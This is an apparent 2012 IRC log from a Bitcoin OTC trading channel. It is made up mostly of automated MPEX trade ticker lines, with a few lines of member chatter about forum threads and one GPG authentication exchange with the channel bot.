[S.MPOE] 6291 @ 0.00052896 = 3.3277 BTC [+] Dec 02 05:00:36 [MPEX] [S.MPOE] 11728 @ 0.000529 = 6.2041 BTC [+] Dec 02 05:01:08 [MPEX] [S.MPOE] 4321 @ 0.00052871 = 2.2846 BTC [-] Dec 02 05:01:10 [MPEX] [S.MPOE] 10172 @ 0.000529 = 5.381 BTC [+] Dec 02 05:01:11 [MPEX] [S.MPOE] 14557 @ 0.00052923 = 7.704 BTC [+] Dec 02 05:08:06 [MPEX] [S.MPOE] 4321 @ 0.00052896 = 2.2856 BTC [-] Dec 02 05:08:07 [MPEX] [S.MPOE] 12243 @ 0.00052923 = 6.4794 BTC [+] Dec 02 05:08:09 [MPEX] [S.MPOE] 17788 @ 0.00052945 = 9.4179 BTC [+] Dec 02 05:09:37 [MPEX] [S.MPOE] 4321 @ 0.00052933 = 2.2872 BTC [-] Dec 02 05:09:38 [MPEX] [S.MPOE] 6079 @ 0.00052945 = 3.2185 BTC [+] Dec 02 05:12:44 [MPEX] [S.MPOE] 4321 @ 0.00052731 = 2.2785 BTC [-] Dec 02 05:12:45 [MPEX] [S.MPOE] 15700 @ 0.000527 = 8.2739 BTC [-] Dec 02 05:16:54 [MPEX] [S.MPOE] 18900 @ 0.00052654 = 9.9516 BTC [-] Dec 02 05:16:56 [MPEX] [S.MPOE] 900 @ 0.00052692 = 0.4742 BTC [+] Dec 02 05:17:54 [MPEX] [S.MPOE] 4321 @ 0.0005168 = 2.2331 BTC [-] Dec 02 05:17:55 [MPEX] [S.MPOE] 1835 @ 0.00051674 = 0.9482 BTC [-] Dec 02 05:17:57 [MPEX] [S.MPOE] 15286 @ 0.00051579 = 7.8844 BTC [-] Dec 02 05:21:56 wow noagendamarket actually stabbed a bunch of people, killing one of them Dec 02 05:22:17 wait, what? Dec 02 05:22:27 https://bitcointalk.org/index.php?topic=128630.20 Dec 02 05:22:34 http://www.animalnoises.com.au/animal-noises-articles/1992/11/28/unstable-killer-jailed/ Dec 02 05:23:39 [MPEX] [S.DICE] 1400 @ 0.003344 = 4.6816 BTC [+] Dec 02 05:24:11 but he was just in here Dec 02 05:28:43 it was 20 years ago and he got a couple years jail Dec 02 05:31:49 [MPEX] [S.MPOE] 4321 @ 0.0005159 = 2.2292 BTC [+] Dec 02 05:31:50 [MPEX] [S.MPOE] 42029 @ 0.00051579 = 21.6781 BTC [-] Dec 02 05:32:18 also https://bitcointalk.org/index.php?topic=128523.0 bitcoin police officer (lol) scams a guy for CCNA brain dumps (LOL) Dec 02 05:35:37 [MPEX] [S.DICE] 1850 @ 0.003344 = 6.1864 BTC [+] Dec 02 05:38:46 [MPEX] [S.MPOE] 10639 @ 0.00051673 = 5.4975 BTC [+] Dec 02 05:38:48 [MPEX] [S.MPOE] 11035 @ 0.00051579 = 5.6917 BTC [-] Dec 02 05:38:49 [MPEX] [S.MPOE] 626 @ 0.00051528 = 0.3226 BTC [-] Dec 02 05:41:13 [MPEX] [S.MPOE] 4321 @ 0.00051949 = 2.2447 BTC [+] Dec 02 05:41:15 [MPEX] [S.MPOE] 7029 @ 0.00051978 = 3.6535 BTC [+] Dec 02 05:41:17 [MPEX] [S.MPOE] 4321 @ 0.00051949 = 2.2447 BTC [-] Dec 02 05:41:18 [MPEX] [S.MPOE] 7029 @ 0.00051978 = 3.6535 BTC [+] Dec 02 05:55:39 [MPEX] [S.MPOE] 4321 @ 0.00051946 = 2.2446 BTC [-] Dec 02 05:55:41 [MPEX] [S.MPOE] 5379 @ 0.00051978 = 2.7959 BTC [+] Dec 02 05:59:33 [MPEX] [S.MPOE] 4321 @ 0.00051543 = 2.2272 BTC [-] Dec 02 05:59:34 [MPEX] [S.MPOE] 7879 @ 0.00051528 = 4.0599 BTC [-] Dec 02 06:06:09 [MPEX] [S.MPOE] 4321 @ 0.00051558 = 2.2278 BTC [+] Dec 02 06:06:11 [MPEX] [S.MPOE] 9579 @ 0.00051528 = 4.9359 BTC [-] Dec 02 06:09:22 [MPEX] [S.MPOE] 3750 @ 0.00051971 = 1.9489 BTC [+] Dec 02 06:13:25 [MPEX] [S.MPOE] 1866 @ 0.00051528 = 0.9615 BTC [-] Dec 02 06:13:27 [MPEX] [S.MPOE] 6900 @ 0.00051508 = 3.5541 BTC [-] Dec 02 06:13:28 [MPEX] [S.MPOE] 9571 @ 0.00051503 = 4.9294 BTC [-] Dec 02 06:13:28 [MPEX] [S.MPOE] 9200 @ 0.0005147 = 4.7352 BTC [-] Dec 02 06:13:30 [MPEX] [S.MPOE] 18450 @ 0.00051379 = 9.4794 BTC [-] Dec 02 06:13:31 [MPEX] [S.MPOE] 14905 @ 0.00051281 = 7.6434 BTC [-] Dec 02 06:14:50 [MPEX] [S.MPOE] 571 @ 0.00051971 = 0.2968 BTC [+] Dec 02 06:14:52 [MPEX] [S.MPOE] 1992 @ 0.00051978 = 1.0354 BTC [+] Dec 02 06:19:07 [MPEX] [S.MPOE] 3637 @ 0.00052033 = 1.8924 BTC [+] Dec 02 06:19:08 [MPEX] [S.MPOE] 39 @ 0.00051281 = 0.02 BTC [-] Dec 02 06:19:10 [MPEX] [S.MPOE] 6250 @ 0.00051252 = 3.2033 BTC [-] Dec 02 06:19:11 [MPEX] [S.MPOE] 1800 @ 0.00051109 = 0.92 BTC [-] Dec 02 06:19:12 [MPEX] [S.MPOE] 12350 @ 0.00051064 = 6.3064 BTC [-] Dec 02 06:19:13 [MPEX] [S.MPOE] 232 @ 0.00050935 = 0.1182 BTC [-] Dec 02 06:19:14 [MPEX] [S.MPOE] 8642 @ 0.0005093 = 4.4014 BTC [-] Dec 02 06:21:32 [MPEX] [S.MPOE] 9800 @ 0.00051638 = 5.0605 BTC [+] Dec 02 06:21:33 [MPEX] [S.MPOE] 4321 @ 0.00052666 = 2.2757 BTC [+] Dec 02 06:21:35 [MPEX] [S.MPOE] 670 @ 0.00052692 = 0.353 BTC [+] Dec 02 06:25:33 [MPEX] [S.MPOE] 9309 @ 0.00052692 = 4.9051 BTC [+] Dec 02 06:25:35 [MPEX] [S.MPOE] 21541 @ 0.0005271 = 11.3543 BTC [+] Dec 02 06:31:44 [MPEX] [S.MPOE] 4321 @ 0.00052933 = 2.2872 BTC [+] Dec 02 06:31:45 [MPEX] [S.MPOE] 116 @ 0.00052945 = 0.0614 BTC [+] Dec 02 06:31:47 [MPEX] [S.MPOE] 12213 @ 0.00052946 = 6.4663 BTC [+] Dec 02 06:34:59 [MPEX] [S.MPOE] 9523 @ 0.0005278 = 5.0262 BTC [-] Dec 02 06:37:03 [MPEX] [S.MPOE] 4321 @ 0.00050945 = 2.2013 BTC [-] Dec 02 06:37:04 [MPEX] [S.MPOE] 1822 @ 0.0005093 = 0.9279 BTC [-] Dec 02 06:37:05 [MPEX] [S.MPOE] 26000 @ 0.00050923 = 13.24 BTC [-] Dec 02 06:37:07 [MPEX] [S.MPOE] 1757 @ 0.00050923 = 0.8947 BTC [-] Dec 02 06:44:24 [MPEX] [S.MPOE] 4321 @ 0.00051104 = 2.2082 BTC [+] Dec 02 06:44:25 [MPEX] [S.MPOE] 17179 @ 0.0005112 = 8.7819 BTC [+] Dec 02 06:52:37 [MPEX] [S.MPOE] 4321 @ 0.00050935 = 2.2009 BTC [-] Dec 02 06:52:38 [MPEX] [S.MPOE] 21629 @ 0.00050923 = 11.0141 BTC [-] Dec 02 06:54:52 [MPEX] [S.MPOE] 4321 @ 0.00051085 = 2.2074 BTC [+] Dec 02 06:54:54 [MPEX] [S.MPOE] 11023 @ 0.0005112 = 5.635 BTC [+] Dec 02 07:01:04 [MPEX] [S.MPOE] 18250 @ 0.0005112 = 9.3294 BTC [+] Dec 02 07:14:36 [MPEX] [S.MPOE] 4321 @ 0.0005095 = 2.2015 BTC [-] Dec 02 07:14:38 [MPEX] [S.MPOE] 6760 @ 0.00050923 = 3.4424 BTC [-] Dec 02 07:24:18 [MPEX] [S.MPOE] 4321 @ 0.00051101 = 2.2081 BTC [+] Dec 02 07:24:20 [MPEX] [S.MPOE] 925 @ 0.0005112 = 0.4729 BTC [+] Dec 02 07:24:21 [MPEX] [S.MPOE] 8368 @ 0.00051172 = 4.2821 BTC [+] Dec 02 07:31:59 [MPEX] [S.MPOE] 8950 @ 0.00051172 = 4.5799 BTC [+] Dec 02 07:37:17 [MPEX] [S.MPOE] 4321 @ 0.00050939 = 2.2011 BTC [-] Dec 02 07:37:18 [MPEX] [S.MPOE] 4749 @ 0.00050923 = 2.4183 BTC [-] Dec 02 07:37:20 [MPEX] [S.MPOE] 6130 @ 0.00050919 = 3.1213 BTC [-] Dec 02 07:46:07 [MPEX] [S.MPOE] 4321 @ 0.00051156 = 2.2105 BTC [+] Dec 02 07:46:08 [MPEX] [S.MPOE] 19579 @ 0.00051172 = 10.019 BTC [+] Dec 02 07:56:19 [MPEX] [S.MPOE] 4321 @ 0.00050923 = 2.2004 BTC [-] Dec 02 07:56:19 [MPEX] [S.MPOE] 7420 @ 0.00050919 = 3.7782 BTC [-] Dec 02 07:56:21 [MPEX] [S.MPOE] 1227 @ 0.00050909 = 0.6247 BTC [-] Dec 02 07:59:27 [MPEX] [S.MPOE] 4321 @ 0.00050924 = 2.2004 BTC [+] Dec 02 07:59:28 [MPEX] [S.MPOE] 3273 @ 0.00050909 = 1.6663 BTC [-] Dec 02 07:59:30 [MPEX] [S.MPOE] 12616 @ 0.00050908 = 6.4226 BTC [-] Dec 02 07:59:31 [MPEX] [S.MPOE] 10290 @ 0.00050899 = 5.2375 BTC [-] **** BEGIN LOGGING AT Sun Dec 2 17:26:51 2012 Dec 02 17:27:55 http://imgur.com/r/funny/NWjzU Dec 02 17:30:01 [MPEX] [S.MPOE] 4321 @ 0.00051088 = 2.2075 BTC [-] Dec 02 17:30:03 [MPEX] [S.MPOE] 4320 @ 0.00051069 = 2.2062 BTC [-] Dec 02 17:30:04 [MPEX] [S.MPOE] 3409 @ 0.00051065 = 1.7408 BTC [-] Dec 02 17:31:22 [MPEX] [S.MPOE] 3450 @ 0.00051436 = 1.7745 BTC [+] Dec 02 17:34:32 [MPEX] [S.MPOE] 4321 @ 0.0005108 = 2.2072 BTC [-] Dec 02 17:34:33 [MPEX] [S.MPOE] 12029 @ 0.00051065 = 6.1426 BTC [-] Dec 02 17:37:35 [MPEX] [S.DICE] 1000 @ 0.0033063 = 3.3063 BTC [+] Dec 02 17:48:01 [MPEX] [S.MPOE] 17676 @ 0.00051065 = 9.0262 BTC [-] Dec 02 17:48:01 [MPEX] [S.MPOE] 1424 @ 0.00050945 = 0.7255 BTC [-] Dec 02 17:49:10 [MPEX] [S.MPOE] 23750 @ 0.00050945 = 12.0994 BTC [-] Dec 02 17:52:54 [MPEX] [S.MPOE] 871 @ 0.00051436 = 0.448 BTC [+] Dec 02 17:52:55 [MPEX] [S.MPOE] 22646 @ 0.0005145 = 11.6514 BTC [+] Dec 02 17:52:57 [MPEX] [S.MPOE] 4001 @ 0.00051706 = 2.0688 BTC [+] Dec 02 17:56:31 [MPEX] [S.MPOE] 4321 @ 0.00050976 = 2.2027 BTC [-] Dec 02 17:56:32 [MPEX] [S.MPOE] 13026 @ 0.00050945 = 6.6361 BTC [-] Dec 02 18:00:18 [MPEX] [S.DICE] 1000 @ 0.00328545 = 3.2855 BTC [-] Dec 02 18:04:15 [MPEX] [S.MPOE] 9384 @ 0.00050733 = 4.7608 BTC [-] Dec 02 18:11:08 [MPEX] [S.MPOE] 3535 @ 0.00050761 = 1.7944 BTC [+] Dec 02 18:21:18 [MPEX] [S.MPOE] 17200 @ 0.00050761 = 8.7309 BTC [+] Dec 02 18:28:26 [MPEX] [S.MPOE] 4465 @ 0.00050761 = 2.2665 BTC [+] Dec 02 18:28:27 [MPEX] [S.MPOE] 1135 @ 0.00050911 = 0.5778 BTC [+] Dec 02 18:29:30 [MPEX] [S.MPOE] 15318 @ 0.00050911 = 7.7985 BTC [+] Dec 02 18:29:31 [MPEX] [S.MPOE] 14049 @ 0.00051706 = 7.2642 BTC [+] Dec 02 18:29:33 [MPEX] [S.MPOE] 11633 @ 0.00051824 = 6.0287 BTC [+] Dec 02 18:34:47 [MPEX] [S.MPOE] 4321 @ 0.0005135 = 2.2188 BTC [-] Dec 02 18:34:48 [MPEX] [S.MPOE] 3224 @ 0.00051371 = 1.6562 BTC [+] Dec 02 18:56:32 [MPEX] [S.MPOE] 4321 @ 0.00051368 = 2.2196 BTC [-] Dec 02 18:56:33 [MPEX] [S.MPOE] 12426 @ 0.00051371 = 6.3834 BTC [+] Dec 02 18:56:34 [MPEX] [S.MPOE] 7353 @ 0.00051456 = 3.7836 BTC [+] Dec 02 18:58:27 ;;gpg eauth ColdHardMetal Dec 02 18:58:28 Request successful for user ColdHardMetal, hostmask ColdHardMetal!~IceChat77@unaffiliated/coldhardmetal. Get your encrypted OTP from http://bitcoin-otc.com/otps/0468F54ABEACA9BD Dec 02 18:59:21 ;;gpg everify freenode:#bitcoin-otc:cbe5f3cd1cb816b08bed5f6781ca1c1e7784c2c9011447b67b4a0574 Dec 02 18:59:23 You are now authenticated for user ColdHardMetal with key 0468F54ABEACA9BD Dec 02 18:59:23 [MPEX] [S.MPOE] 4321 @ 0.00051255 = 2.2147 BTC [-] Dec 02 18:59:24 [MPEX] [S.MPOE] 4579 @ 0.00051227 = 2.3457 BTC [-] Dec 02 19:06:37 [MPEX] [S.MPOE] 21500 @ 0.00051252 = 11.0192 BTC [+] Dec 02 19:06:39 [MPEX] [S.MPOE] 250 @ 0.00051456 = 0.1286 BTC [+] Dec 02 19:10:29 [MPEX] [S.MPOE] 4321 @ 0.00051255 = 2.2147 BTC [-] Dec 02 19:10:31 [MPEX] [S.MPOE] 20179 @ 0.00051227 = 10.3371 BTC [-] Dec 02 19:19:37 [MPEX] [S.MPOE] 13100 @ 0.00051265 = 6.7157 BTC [+] Dec 02 19:19:39 [MPEX] [S.MPOE] 25933 @ 0.00051456 = 13.3441 BTC [+] Dec 02 19:22:30 [MPEX] [S.MPOE] 4321 @ 0.00051425 = 2.2221 BTC [-] Dec 02 19:22:32 [MPEX] [S.MPOE] 17379 @ 0.00051456 = 8.9425 BTC [+] Dec 02 19:24:59 [MPEX] [S.MPOE] 4321 @ 0.00051426 = 2.2221 BTC [-] Dec 02 19:25:01 [MPEX] [S.MPOE] 13985 @ 0.00051456 = 7.1961 BTC [+] Dec 02 19:25:02 [MPEX] [S.MPOE] 5403 @ 0.00051562 = 2.7859 BTC [+] Dec 02 19:36:32 [MPEX] [S.MPOE] 4321 @ 0.00051239 = 2.214 BTC [-] Dec 02 19:36:37 [MPEX] [S.MPOE] 10953 @ 0.00051227 = 5.6109 BTC [-] Dec 02 19:42:19 [MPEX] [S.MPOE] 4321 @ 0.00051094 = 2.2078 BTC [-] Dec 02 19:42:20 [MPEX] [S.MPOE] 12497 @ 0.00051087 = 6.3843 BTC [-] Dec 02 19:42:22 [MPEX] [S.MPOE] 5332 @ 0.00050733 = 2.7051 BTC [-] Dec 02 19:47:51 [MPEX] [S.MPOE] 13739 @ 0.00050733 = 6.9702 BTC [-] Dec 02 19:47:53 [MPEX] [S.MPOE] 9281 @ 0.00050729 = 4.7082 BTC [-] Dec 02 19:47:54 [MPEX] [S.MPOE] 7480 @ 0.00050697 = 3.7921 BTC [-] Dec 02 19:51:49 [MPEX] [S.MPOE] 15470 @ 0.00050697 = 7.8428 BTC [-] Dec 02 19:51:50 [MPEX] [S.MPOE] 9045 @ 0.00050696 = 4.5855 BTC [-] Dec 02 19:58:54 [MPEX] [S.MPOE] 4664 @ 0.0005118 = 2.387 BTC [+] Dec 02 19:58:56 [MPEX] [S.MPOE] 4321 @ 0.00051543 = 2.2272 BTC [+] Dec 02 19:58:57 [MPEX] [S.MPOE] 5315 @ 0.00051562 = 2.7405 BTC [+] Dec 02 19:59:43 [MPEX] [S.MPOE] 4321 @ 0.00050712 = 2.1913 BTC [-] Dec 02 19:59:44 [MPEX] [S.MPOE] 1805 @ 0.00050696 = 0.9151 BTC [-] Dec 02 19:59:46 [MPEX] [S.MPOE] 11898 @ 0.00050685 = 6.0305 BTC [-] Dec 02 20:00:17 [MPEX] [S.DICE] 550 @ 0.0033063 = 1.8185 BTC [+] Dec 02 20:00:36 [MPEX] [S.MPOE] 4352 @ 0.00050685 = 2.2058 BTC [-] Dec 02 20:00:37 [MPEX] [S.MPOE] 13711 @ 0.00050679 = 6.9486 BTC [-] Dec 02 20:04:21 [MPEX] [S.MPOE] 4321 @ 0.00051549 = 2.2274 BTC [+] Dec 02 20:04:23 [MPEX] [S.MPOE] 11382 @ 0.00051562 = 5.8688 BTC [+] Dec 02 20:04:23 [MPEX] [S.MPOE] 5247 @ 0.00051633 = 2.7092 BTC [+] Dec 02 20:12:49 [MPEX] [S.MPOE] 4321 @ 0.00051631 = 2.231 BTC [-] Dec 02 20:12:51 [MPEX] [S.MPOE] 7729 @ 0.00051633 = 3.9907 BTC [+] Dec 02 20:15:53 [MPEX] [S.MPOE] 4321 @ 0.00050703 = 2.1909 BTC [-] Dec 02 20:15:54 [MPEX] [S.MPOE] 8789 @ 0.00050679 = 4.4542 BTC [-] Dec 02 20:15:55 [MPEX] [S.MPOE] 18600 @ 0.0005067 = 9.4246 BTC [-] Dec 02 20:15:56 [MPEX] [S.MPOE] 590 @ 0.00050662 = 0.2989 BTC [-] Dec 02 20:21:11 [MPEX] [S.MPOE] 4321 @ 0.00050663 = 2.1891 BTC [+] Dec 02 20:21:12 [MPEX] [S.MPOE] 7660 @ 0.00050662 = 3.8807 BTC [-] Dec 02 20:21:14 [MPEX] [S.MPOE] 10719 @ 0.00050658 = 5.43 BTC [-] Dec 02 20:32:17 [MPEX] [S.MPOE] 4321 @ 0.00051599 = 2.2296 BTC [+] Dec 02 20:32:18 [MPEX] [S.MPOE] 3029 @ 0.00051633 = 1.564 BTC [+] Dec 02 20:49:07 [MPEX] [S.DICE] 2836 @ 0.00332656 = 9.4341 BTC [+] Dec 02 20:51:03 [MPEX] [S.MPOE] 4321 @ 0.00051602 = 2.2297 BTC [-] Dec 02 20:51:04 [MPEX] [S.MPOE] 7879 @ 0.00051633 = 4.0682 BTC [+] Dec 02 20:58:49 [MPEX] [S.MPOE] 4321 @ 0.00051618 = 2.2304 BTC [-] Dec 02 20:58:51 [MPEX] [S.MPOE] 616 @ 0.00051633 = 0.3181 BTC [+] Dec 02 20:58:52 [MPEX] [S.MPOE] 10900 @ 0.00051697 = 5.635 BTC [+] Dec 02 20:58:52 [MPEX] [S.MPOE] 2163 @ 0.0005173 = 1.1189 BTC [+] Dec 02 21:03:55 [MPEX] [S.MPOE] 4321 @ 0.00051145 = 2.21 BTC [-] Dec 02 21:03:55 [MPEX] [S.MPOE] 29900 @ 0.00051118 = 15.2843 BTC [-] Dec 02 21:03:57 [MPEX] [S.MPOE] 2679 @ 0.00051008 = 1.3665 BTC [-] Dec 02 21:10:26 [MPEX] [S.DICE] 5550 @ 0.00331 = 18.3705 BTC [-] Dec 02 21:15:30 [MPEX] [S.MPOE] 4321 @ 0.00051034 = 2.2052 BTC [+] Dec 02 21:15:31 [MPEX] [S.MPOE] 5829 @ 0.00051008 = 2.9733 BTC [-] Dec 02 21:23:12 [MPEX] [S.MPOE] 4321 @ 0.00051012 = 2.2042 BTC [+] Dec 02 21:23:13 [MPEX] [S.MPOE] 13819 @ 0.00051008 = 7.0488 BTC [-] Dec 02 21:30:17 [MPEX] [S.MPOE] 11800 @ 0.00051028 = 6.0213 BTC [+] Dec 02 21:30:19 [MPEX] [S.MPOE] 2973 @ 0.00051008 = 1.5165 BTC [-] Dec 02 21:40:18 [MPEX] [S.MPOE] 1876 @ 0.0005089 = 0.9547 BTC [-] Dec 02 21:40:20 [MPEX] [S.MPOE] 1124 @ 0.00051606 = 0.5801 BTC [+] Dec 02 21:44:43 [MPEX] [S.MPOE] 9150 @ 0.00051057 = 4.6717 BTC [-] Dec 02 21:46:58 [MPEX] [S.DICE] 42900 @ 0.00331 = 141.999 BTC [-] Dec 02 21:51:16 [MPEX] [S.DICE] 1386 @ 0.00328545 = 4.5536 BTC [-] Dec 02 21:51:17 [MPEX] [S.DICE] 2300 @ 0.00326791 = 7.5162 BTC [-] Dec 02 21:51:19 [MPEX] [S.DICE] 814 @ 0.0032648 = 2.6575 BTC [-] Dec 02 21:52:24 [MPEX] [S.MPOE] 3197 @ 0.00051606 = 1.6498 BTC [+] Dec 02 21:52:25 [MPEX] [S.MPOE] 13050 @ 0.00051638 = 6.7388 BTC [+] Dec 02 21:52:27 [MPEX] [S.MPOE] 11370 @ 0.0005173 = 5.8817 BTC [+] Dec 02 21:52:28 [MPEX] [S.MPOE] 18133 @ 0.00051747 = 9.3833 BTC [+] Dec 02 21:57:44 [MPEX] [S.MPOE] 4321 @ 0.00051058 = 2.2062 BTC [-] Dec 02 21:57:46 [MPEX] [S.MPOE] 9900 @ 0.00051057 = 5.0546 BTC [-] Dec 02 21:57:47 [MPEX] [S.MPOE] 1710 @ 0.00050688 = 0.8668 BTC [-] Dec 02 22:00:46 [MPEX] [S.MPOE] 4321 @ 0.00051721 = 2.2349 BTC [+] Dec 02 22:00:47 [MPEX] [S.MPOE] 7117 @ 0.00051747 = 3.6828 BTC [+] Dec 02 22:00:48 [MPEX] [S.MPOE] 3212 @ 0.00051824 = 1.6646 BTC [+] Dec 02 22:18:48 [MPEX] [S.MPOE] 4321 @ 0.00051526 = 2.2264 BTC [-] Dec 02 22:18:50 [MPEX] [S.MPOE] 16012 @ 0.00051545 = 8.2534 BTC [+] Dec 02 22:18:51 [MPEX] [S.MPOE] 6117 @ 0.00051591 = 3.1558 BTC [+] Dec 02 22:32:05 [MPEX] [S.MPOE] 9400 @ 0.00050801 = 4.7753 BTC [-] Dec 02 22:35:50 [14:57] [MPEX] [S.MPOE] 1710 @ 0.00050688 = 0.8668 BTC [-] Dec 02 22:35:54 wtf Dec 02 22:40:22 [MPEX] [S.MPOE] 4321 @ 0.00050832 = 2.1965 BTC [+] Dec 02 22:40:23 [MPEX] [S.MPOE] 8679 @ 0.00050821 = 4.4108 BTC [-] Dec 02 22:46:39 [MPEX] [S.MPOE] 4321 @ 0.00050844 = 2.197 BTC [+] Dec 02 22:46:40 [MPEX] [S.MPOE] 17721 @ 0.00050821 = 9.006 BTC [-] Dec 02 22:46:42 [MPEX] [S.MPOE] 900 @ 0.00050801 = 0.4572 BTC [-] Dec 02 22:49:51 hm ? Dec 02 22:50:14 mispaste Dec 02 22:50:55 [MPEX] [S.MPOE] 21491 @ 0.00050688 = 10.8934 BTC [-] Dec 02 22:50:57 [MPEX] [S.MPOE] 7853 @ 0.00050679 = 3.9798 BTC [-] Dec 02 22:54:52 [MPEX] [S.MPOE] 8047 @ 0.00050679 = 4.0781 BTC [-] Dec 02 22:54:54 [MPEX] [S.MPOE] 7618 @ 0.00050658 = 3.8591 BTC [-] Dec 02 22:59:09 [MPEX] [S.MPOE] 11850 @ 0.00050742 = 6.0129 BTC [+] Dec 02 23:01:00 [MPEX] [S.MPOE] 14326 @ 0.00050658 = 7.2573 BTC [-] Dec 02 23:01:01 [MPEX] [S.MPOE] 7774 @ 0.00050654 = 3.9378 BTC [-] Dec 02 23:02:57 [MPEX] [S.MPOE] 4526 @ 0.00050654 = 2.2926 BTC [-] Dec 02 23:02:58 [MPEX] [S.MPOE] 6300 @ 0.00050647 = 3.1908 BTC [-] Dec 02 23:02:59 [MPEX] [S.MPOE] 12100 @ 0.00050643 = 6.1278 BTC [-] Dec 02 23:03:00 [MPEX] [S.MPOE] 15100 @ 0.0005064 = 7.6466 BTC [-] Dec 02 23:03:01 [MPEX] [S.MPOE] 13874 @ 0.00050635 = 7.0251 BTC [-] Dec 02 23:07:26 [MPEX] [S.MPOE] 4268 @ 0.00050742 = 2.1657 BTC [+] Dec 02 23:11:57 [MPEX] [S.MPOE] 4321 @ 0.00051562 = 2.228 BTC [+] Dec 02 23:11:58 [MPEX] [S.MPOE] 10483 @ 0.00051591 = 5.4083 BTC [+] Dec 02 23:12:00 [MPEX] [S.MPOE] 5996 @ 0.00051596 = 3.0937 BTC [+] Dec 02 23:15:32 [MPEX] [S.MPOE] 4321 @ 0.0005086 = 2.1977 BTC [-] Dec 02 23:15:34 [MPEX] [S.MPOE] 11142 @ 0.00050858 = 5.6666 BTC [-] Dec 02 23:15:35 [MPEX] [S.MPOE] 13498 @ 0.00050635 = 6.8347 BTC [-] Dec 02 23:15:36 [MPEX] [S.MPOE] 13889 @ 0.00050632 = 7.0323 BTC [-] Dec 02 23:23:15 [MPEX] [S.MPOE] 5100 @ 0.00050632 = 2.5822 BTC [-] Dec 02 23:32:14 [MPEX] [S.MPOE] 8311 @ 0.00050632 = 4.208 BTC [-] Dec 02 23:32:16 [MPEX] [S.MPOE] 9989 @ 0.00050631 = 5.0575 BTC [-] Dec 02 23:36:41 [MPEX] [S.MPOE] 6043 @ 0.00050631 = 3.0596 BTC [-] Dec 02 23:36:43 [MPEX] [S.MPOE] 29257 @ 0.00050624 = 14.8111 BTC [-] Dec 02 23:46:57 [MPEX] [S.MPOE] 14619 @ 0.00050781 = 7.4237 BTC [+] Dec 02 23:46:59 [MPEX] [S.MPOE] 7300 @ 0.0005116 = 3.7347 BTC [+] Dec 02 23:47:00 [MPEX] [S.MPOE] 8781 @ 0.00051596 = 4.5306 BTC [+] Dec 02 23:54:31 [MPEX] [S.MPOE] 4321 @ 0.00051561 = 2.228 BTC [-] Dec 02 23:54:33 [MPEX] [S.MPOE] 3179 @ 0.00051596 = 1.6402 BTC [+] Dec 02 23:56:02 [MPEX] [S.DICE] 3550 @ 0.00326701 = 11.5979 BTC [+] Dec 03 00:08:16 [MPEX] [S.MPOE] 3000 @ 0.00051589 = 1.5477 BTC [-] Dec 03 00:12:43 [MPEX] [S.MPOE] 4321 @ 0.00050665 = 2.1892 BTC [-] Dec 03 00:12:44 [MPEX] [S.MPOE] 15000 @ 0.00050632 = 7.5948 BTC [-] Dec 03 00:12:45 [MPEX] [S.MPOE] 6693 @ 0.00050624 = 3.3883 BTC [-] Dec 03 00:12:47 [MPEX] [S.MPOE] 37186 @ 0.00050622 = 18.8243 BTC [-] Dec 03 00:29:07 [MPEX] [S.MPOE] 16800 @ 0.00051018 = 8.571 BTC [+] Dec 03 00:35:11 [MPEX] [S.MPOE] 17200 @ 0.00051018 = 8.7751 BTC [+] Dec 03 00:35:12 [MPEX] [S.MPOE] 2514 @ 0.00050622 = 1.2726 BTC [-] Dec 03 00:35:14 [MPEX] [S.MPOE] 14186 @ 0.00050619 = 7.1808 BTC [-] Dec 03 00:45:16 [MPEX] [S.MPOE] 16700 @ 0.00051384 = 8.5811 BTC [+] Dec 03 00:46:51 [MPEX] [S.MPOE] 5971 @ 0.00051384 = 3.0681 BTC [+] Dec 03 00:51:36 [MPEX] [S.MPOE] 25314 @ 0.00050619 = 12.8137 BTC [-] Dec 03 00:51:37 [MPEX] [S.MPOE] 2386 @ 0.00050618 = 1.2077 BTC [-] Dec 03 00:52:59 [MPEX] [S.MPOE] 4321 @ 0.00051067 = 2.2066 BTC [+] Dec 03 00:53:01 [MPEX] [S.MPOE] 2929 @ 0.00051067 = 1.4958 BTC [+] Dec 03 00:57:55 [MPEX] [S.MPOE] 6583 @ 0.00050899 = 3.3507 BTC [-] Dec 03 01:04:39 [MPEX] [S.MPOE] 24567 @ 0.00050899 = 12.5044 BTC [-] Dec 03 01:04:41 [MPEX] [S.MPOE] 38133 @ 0.00051091 = 19.4825 BTC [+] Dec 03 01:06:42 [MPEX] [S.MPOE] 4984 @ 0.00051091 = 2.5464 BTC [+] Dec 03 01:08:41 [MPEX] [S.MPOE] 3800 @ 0.00051577 = 1.9599 BTC [+] Dec 03 01:08:43 [MPEX] [S.MPOE] 5830 @ 0.00051132 = 2.981 BTC [-] Dec 03 01:08:43 [MPEX] [S.MPOE] 1720 @ 0.00050736 = 0.8727 BTC [-] Dec 03 01:31:23 [MPEX] [S.MPOE] 16850 @ 0.00051243 = 8.6344 BTC [+] Dec 03 01:44:13 [MPEX] [S.MPOE] 14600 @ 0.00051049 = 7.4532 BTC [-] Dec 03 01:44:15 [MPEX] [S.MPOE] 3530 @ 0.00051596 = 1.8213 BTC [+] Dec 03 01:44:16 [MPEX] [S.MPOE] 9664 @ 0.00051605 = 4.9871 BTC [+] Dec 03 01:50:06 [MPEX] [S.DICE] 4269 @ 0.00326536 = 13.9398 BTC [-] Dec 03 01:55:21 [MPEX] [S.MPOE] 2601 @ 0.00050734 = 1.3196 BTC [-] Dec 03 01:55:22 [MPEX] [S.MPOE] 5099 @ 0.00050706 = 2.5855 BTC [-] Dec 03 01:57:40 [MPEX] [S.MPOE] 4321 @ 0.00051597 = 2.2295 BTC [+] Dec 03 01:57:42 [MPEX] [S.MPOE] 17961 @ 0.00051605 = 9.2688 BTC [+] Dec 03 01:59:57 [MPEX] [S.MPOE] 13175 @ 0.00051605 = 6.799 BTC [+] Dec 03 02:05:02 [MPEX] [S.MPOE] 17050 @ 0.0005174 = 8.8217 BTC [+] Dec 03 02:10:12 [MPEX] [S.MPOE] 4700 @ 0.0005174 = 2.4318 BTC [+] Dec 03 02:20:19 [MPEX] [S.MPOE] 14875 @ 0.00051732 = 7.6951 BTC [-] Dec 03 02:25:02 [MPEX] [S.MPOE] 5600 @ 0.00051332 = 2.8746 BTC [-] Dec 03 02:29:29 [MPEX] [S.MPOE] 16475 @ 0.00051332 = 8.4569 BTC [-] Dec 03 02:29:31 [MPEX] [S.MPOE] 16625 @ 0.0005174 = 8.6018 BTC [+] Dec 03 02:37:28 [MPEX] [S.MPOE] 3416 @ 0.0005174 = 1.7674 BTC [+] Dec 03 02:37:29 [MPEX] [S.MPOE] 11584 @ 0.00051754 = 5.9952 BTC 